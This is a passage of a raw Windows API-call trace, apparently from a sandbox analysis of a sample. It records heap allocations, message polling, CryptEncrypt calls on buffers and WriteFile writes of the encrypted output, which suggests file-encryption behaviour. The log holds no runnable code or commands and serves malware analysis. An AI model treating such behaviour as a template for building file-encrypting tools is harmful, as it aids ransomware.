lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0244.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0270 | out: hHeap=0x970000) returned 1 [0244.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0244.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0244.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0244.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0470 | out: hHeap=0x970000) returned 1 [0244.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0244.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0244.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0244.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0244.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b58 [0244.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0244.666] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b58 | out: hHeap=0x970000) returned 1 [0244.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0244.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0244.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0244.666] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0244.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0244.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0244.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0244.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0244.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0244.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0244.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0244.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0244.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0244.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0244.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0244.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0244.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0244.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0244.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0244.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0244.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0244.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0244.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0244.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0244.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0244.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0244.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0244.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0244.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0244.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1f8) returned 0x3bf0270 [0244.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0270 | out: hHeap=0x970000) returned 1 [0244.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0244.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0244.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0244.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0244.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0244.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0244.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978690 [0244.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0244.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0244.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0244.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0244.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0244.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0244.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0244.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0244.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0244.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0244.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0244.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0244.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0244.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0244.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0244.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0244.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0244.670] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0244.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0244.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0244.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0244.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0244.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0244.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0244.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0244.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0244.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0244.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0244.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0244.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0244.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0244.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0244.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0244.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0244.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0244.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0244.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0244.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0244.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0244.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0244.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0244.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0244.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0244.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0244.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0244.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0244.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0244.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0244.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51508 [0244.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51508, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0244.672] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e565a8*, pdwDataLen=0x8cef60*=0x1f8, dwBufLen=0x200 | out: pbData=0x2e565a8*, pdwDataLen=0x8cef60*=0x200) returned 1 [0244.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3bf0270 [0244.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0244.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0244.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0244.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0244.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0244.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0244.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0244.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0244.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0244.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0244.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0244.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0244.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0244.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0244.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0244.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0244.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0244.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0244.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0244.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0244.707] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0244.707] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0244.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0244.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0244.707] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0244.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0244.707] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0244.707] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0244.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56028 [0244.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0244.707] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0244.707] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0244.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0244.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0244.708] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0244.708] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0244.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0244.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e30 [0244.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0244.708] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0244.708] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0244.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0244.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0244.708] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0244.708] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0244.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0244.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0244.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0244.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0244.709] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.709] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.709] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0244.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0244.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0244.709] WriteFile (in: hFile=0x2d0, lpBuffer=0x2e561a8*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2e561a8*, lpNumberOfBytesWritten=0x8cf5e4*=0x200, lpOverlapped=0x0) returned 1 [0244.710] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0244.710] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0244.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0244.711] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0244.711] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0244.711] 